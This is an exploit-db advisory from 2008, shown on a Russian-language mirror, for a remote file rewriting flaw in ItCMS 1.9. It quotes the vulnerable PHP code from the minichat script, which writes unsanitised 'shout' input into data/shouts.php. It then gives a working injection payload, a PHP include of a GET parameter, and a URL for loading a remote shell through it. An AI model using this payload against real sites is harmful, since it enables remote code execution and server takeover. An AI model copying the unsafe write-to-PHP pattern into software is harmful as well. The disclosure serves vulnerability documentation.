- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5532
- Проверка EDB
-
- Пройдено
- Автор
- COD3RZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2192
- Дата публикации
- 2008-05-02
Код:
#===========================================================================================================================#
# _ ____ _ _ _ _ #
# __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ #
# / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | #
# \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| #
#===========================================================================================================================#
# ItCMS 1.9 Remote File Rewriting #
#===========================================================================================================================#
# Author : Cod3rZ #
#===========================================================================================================================#
# Site : http://cod3rz.helloweb.eu #
# Site : http://devilsnight.altervista.org #
#===========================================================================================================================#
# Remote File Rewriting: #
#===========================================================================================================================#
# /box/minichat/boxpop.php #
#===========================================================================================================================#
# if ($_POST["shout"]!=""){ #
# $shout = $_POST['shout']; #
# } else if ($_GET["shout"]!=""){ #
# $shout = $_GET["shout"]; #
# } #
# [...] #
# $shout = trim($shout); #
# $shout = stripslashes($shout); #
# $shout = str_replace ("\r\n", " [br] ", $shout); #
# $shout = first($shout); #
# [...] #
# $FileName="data/shouts.php"; #
# if($FilePointer=fopen($FileName, "a+")){ #
# fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n"); #
# fclose($FilePointer); #
#===========================================================================================================================#
# So, we can write a malicious code like <?php include($_GET['rfi']); ?> in the variable $shout, #
# and then we go in data/shouts.php?rfi=[shell] #
#===========================================================================================================================#
# There are many other bugs, find it yourself #
#===========================================================================================================================#
# Devils Night Corporation - http://devilsnight.altervista.org #
#===========================================================================================================================#
# milw0rm.com [2008-05-02]- Источник
- www.exploit-db.com
